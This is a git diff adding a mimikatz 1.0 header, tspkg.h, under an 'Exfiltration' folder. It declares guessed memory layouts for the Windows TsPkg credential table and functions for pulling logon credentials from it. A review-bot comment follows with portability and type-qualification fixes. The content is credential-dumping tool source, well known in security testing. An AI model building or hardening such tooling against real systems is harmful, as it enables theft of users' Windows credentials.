Diffstat (limited to 'Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h')
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h37
1 files changed, 37 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h
new file mode 100644
index 0000000..35a3b15
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h
@@ -0,0 +1,37 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+ Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "../mod_mimikatz_sekurlsa.h"
+
+class mod_mimikatz_sekurlsa_tspkg {
+
+private:
+ typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
+ PVOID unk0; // lock ?
+ KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
+ } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;
+
+ typedef struct _KIWI_TS_CREDENTIAL {
+ #ifdef _M_X64
+ BYTE unk0[108];
+ #elif defined _M_IX86
+ BYTE unk0[64];
+ #endif
+ LUID LocallyUniqueIdentifier;
+ PVOID unk1;
+ PVOID unk2;
+ PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
+ } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
+
+ static PRTL_AVL_TABLE TSGlobalCredTable;
+ static bool searchTSPKGFuncs();
+
+public:
+ static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModTSPKG;
+ static bool getTsPkg(vector<wstring> * arguments);
+ static bool WINAPI getTsPkgLogonData(__in PLUID logId, __in bool justSecurity);
+};
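Review bot: The `#ifdef _M_X64` / `#elif defined _M_IX86` block inside `_KIWI_TS_CREDENTIAL` has no `#else`, so on any other target the `unk0` padding is silently dropped and the offsets of `LocallyUniqueIdentifier` and `pTsPrimary` shift; add `#else` followed by `#error "unsupported architecture"` before the `#endif`. The 108- and 64-byte sizes and the `// lock ?` field are undocumented guesses at a private layout, and nothing in the header says which OS builds they were checked against, so a short comment recording that would tell a reader when the structs can no longer be trusted. `getTsPkg` takes an unqualified `vector<wstring>` although the header includes neither `<vector>` nor `<string>`, so it presumably depends on a using-directive pulled in through `mod_mimikatz_sekurlsa.h`; writing `std::vector<std::wstring> * arguments` would make the declaration self-contained.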